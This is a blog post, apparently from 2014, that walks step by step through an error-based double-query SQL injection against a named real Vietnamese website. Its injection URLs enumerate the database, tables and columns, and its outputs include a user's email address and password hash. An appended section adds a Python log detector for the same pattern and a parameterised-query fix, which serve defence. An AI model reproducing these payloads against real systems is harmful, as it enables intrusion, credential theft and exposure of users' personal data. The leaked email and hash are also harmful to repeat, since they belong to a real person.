Tuesday, June 10, 2014

Error Based/Double Query SQL injection

Victim: http://hanggiasoc.vn/tim-kiem?q=%27
Error: CDbCommand không thể thi hành câu truy vấn SQL: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' AND published = 1' at line 1

Finding the database:
http://hanggiasoc.vn/tim-kiem?q=1' or+1+group+by+concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))+having+min(0)+or+1-- -

'5.0.96:betahgs:betahgs@localhost:1' for key 1

Finding tables:
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

'authassignment~1' for key 1

The table we need is the user table (increase the limit):
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 26,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Duplicate entry 'users~1' for key 1

Show the columns of the table just found:
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -


Increase the limit to find the columns we need (email, password):
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Duplicate entry 'email~1' for key 1

http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Duplicate entry 'password~1' for key 1

Result:
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(concat(email) as char),0x7e)) from betahgs.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Duplicate entry '007.heineken@gmail.com~1' for key 1

Similarly:
http://hanggiasoc.vn/tim-kiem?q=1' and (select 1 from (select count(*),concat((select(select concat(cast(concat(password) as char),0x7e)) from betahgs.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
'1a2a861efa455bfa46f387e8cf4818e1~1' for key 1
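Every request above relies on the same MySQL trick: `floor(rand(0)*2)` inside a `GROUP BY` forces a duplicate-key error that echoes the injected value. That pairing is a strong signature for log review. The detector below is an added defensive example, not part of the original post; the access-log lines and the host are constructed, and the payload shapes follow the ones shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Fragments of the error-based / double-query technique shown above; each is
# matched against a normalised (decoded, lower-cased) query-parameter value.
SIGNATURES = {
    "rand_floor":  re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "group_by":    re.compile(r"\bgroup\s+by\b"),
    "count_star":  re.compile(r"count\s*\(\s*\*\s*\)"),
    "info_schema": re.compile(r"\binformation_schema\."),
    "comment":     re.compile(r"--\s*-?\s*$|#\s*$"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
# Constructed access-log lines (hypothetical host, payload shapes as on this page).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2014:09:12:01 +0700] "GET /tim-kiem?q=laptop+dell HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Jun/2014:09:12:44 +0700] "GET /tim-kiem?q=1%27+and+(select+1+from+(select+count(*),'
    'concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+- HTTP/1.1" 500 812',
    '10.0.0.9 - - [10/Jun/2014:09:13:02 +0700] "GET /tim-kiem?q=1%2527+or+1+group+by+concat_ws(0x3a,'
    'version(),floor(rand(0)*2))+having+min(0)+or+1--+- HTTP/1.1" 500 790',
]

def normalise(value):
    """Decode twice (catches %2527-style double encoding), collapse whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded).strip().lower()

def score_request(url):
    """Map each query parameter of a URL or path to the signature names it matches."""
    hits = {}
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for raw in values:
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(normalise(raw))]
            if matched:
                hits[name] = matched
    return hits

def is_double_query_sqli(url):
    """Alert only when rand/floor and GROUP BY co-occur: that pairing is the duplicate-key trick."""
    return any("rand_floor" in m and "group_by" in m for m in score_request(url).values())

def scan_log(lines):
    """Return (client_ip, path, matches) for every log line carrying the pattern."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_double_query_sqli(m.group(2)):
            flagged.append((m.group(1), m.group(2), score_request(m.group(2))))
    return flagged
```

The fix on the application side is the usual one: the search term belongs in a bound parameter of the `... AND published = 1` query, never concatenated into it, and `information_schema` reads should be denied to the web application's database account.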

End :v

